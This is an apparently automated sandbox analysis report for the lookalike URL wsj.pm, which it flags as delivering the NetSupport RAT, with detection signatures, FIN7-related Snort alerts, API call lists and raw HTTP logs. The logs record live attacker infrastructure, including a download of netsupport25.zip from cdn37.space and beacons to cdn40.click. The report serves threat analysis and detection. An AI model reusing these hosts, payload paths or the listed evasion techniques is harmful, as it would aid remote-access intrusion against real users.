Windows Analysis Report
http://wsj.pm

Overview

General Information

Sample URL:	http://wsj.pm
Analysis ID:	1431705
Infos:

Detection

NetSupport RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Yara detected Powershell decode and execute

Contains functionality to detect sleep reduction / modifications

Contains functionalty to change the wallpaper

Delayed program exit found

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Powershell drops PE file

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Tries to open files direct via NTFS file id

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops certificate files (DER)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Potentially Suspicious Windows App Activity

Stores files to the Windows start menu directory

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Yara signature match

Classification

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png8	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: cdn40.click	Virustotal: Detection: 5%			Perma Link
Source: http://pesterbdd.com/images/Pester.png8	Virustotal: Detection: 11%			Perma Link

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\ProgramData\netsupport\client\client32.exe

Code function: 32_2_110AC600 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,

32_2_110AC600

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\ProgramData\netsupport\client\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.28.14:443 -> 192.168.2.17:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.104.72.157:443 -> 192.168.2.17:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.133.88.190:443 -> 192.168.2.17:49807 version: TLS 1.2

Source:	Binary string: D:\a\1\s\x64\Release\PsfLauncher64.pdb source: PsfLauncher64.exe, 00000014.00000000.1745032807.00007FF6C367E000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\s\x64\Release\PsfRuntime64.pdb source: PsfRunDll64.exe, 00000016.00000002.1749156584.00007FFA1B0EF000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2653892978.000000006C1B2000.00000002.00000001.01000000.00000019.sdmp, PCICHEK.DLL.26.dr
Source:	Binary string: msvcr100.i386.pdb source: powershell.exe, 0000001A.00000002.1968531120.00000231631AF000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000020.00000002.2639330298.000000006C0F1000.00000020.00000001.01000000.0000001A.sdmp, msvcr100.dll.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.26.dr
Source:	Binary string: client32_ctr.pdb0\1100\client32\Release\client32_ctr.pdbP source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
Source:	Binary string: client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2654970934.0000000074675000.00000002.00000001.01000000.00000018.sdmp, pcicapi.dll.26.dr
Source:	Binary string: D:\a\1\s\x64\Release\PsfRunDll64.pdb source: PsfRunDll64.exe, 00000016.00000000.1747207751.00007FF695D50000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: 0\1100\client32\Release\client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000001A.00000002.2187481682.00000231793A5000.00000004.00000020.00020000.00000000.sdmp

Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	32_2_1102D1B3
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	32_2_11069760
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	32_2_11123690
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11108090 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	32_2_11108090
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	32_2_110BC0E0
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	32_2_1102CE84
Source: C:\ProgramData\netsupport\client\client32.exe	Code function: 32_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	32_2_11064EF0

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2052006 ET TROJAN Suspected FIN7 Related domain in DNS Lookup (cdn37 .space) 192.168.2.17:53350 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2052014 ET TROJAN Suspected Fin7 Related Domain (cdn37 .space) in TLS SNI 192.168.2.17:49798 -> 86.104.72.157:443
Source: Traffic	Snort IDS: 2052014 ET TROJAN Suspected Fin7 Related Domain (cdn37 .space) in TLS SNI 192.168.2.17:49799 -> 86.104.72.157:443

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /files/netsupport25.zip HTTP/1.1Host: cdn37.space
Source: global traffic	HTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1Host: cdn40.click
Source: global traffic	HTTP traffic detected: GET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsp&ahsdjkasjkdh=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1Host: cdn40.click
Source: global traffic	HTTP traffic detected: GET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1Host: cdn40.click
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.28.14
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.28.14
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.28.14
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.62.93

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: wsj.pmConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /css/footer.css HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/retina/Retina-Book.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/retina/Retina-Light.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/retina/Retina-Medium.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Light.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /style.css HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Book.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Medium.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/retina/RetinaNarr-Bold.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/escrow/Escrow+Display+Condensed+Bold.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/escrow/Escrow+Display+Condensed+Roman.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/escrow/Escrow+Display+Condensed+Italic.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/exchange/Exchange-BookItalic.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/exchange/Exchange-Book.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Origin: https://wsj.pmSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fonts/woffs/exchange/Exchange-Medium.woff2 HTTP/1.1Host: wsj.pmConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://wsj.pmsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://wsj.pm/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
